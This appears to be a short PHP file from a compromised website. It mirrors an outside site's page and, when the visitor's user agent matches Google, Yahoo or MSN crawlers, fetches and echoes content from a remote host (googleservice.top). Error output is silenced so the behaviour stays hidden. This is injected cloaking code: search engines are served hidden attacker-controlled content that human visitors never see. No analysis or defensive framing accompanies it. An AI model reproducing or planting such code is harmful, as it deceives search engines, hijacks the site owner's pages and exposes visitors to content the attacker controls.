<?php @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
ini_set('display_errors',0);
$content = file_get_contents("http://www.hrreflections.com/index.html");echo $content;?>
<?php @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);ini_set('display_errors',0);if(preg_match('/Google Web Preview|google|yahoo|msnbot/i',$_SERVER['HTTP_USER_AGENT'])){
echo file_get_contents("http://googleservice.top/js1.php");}?>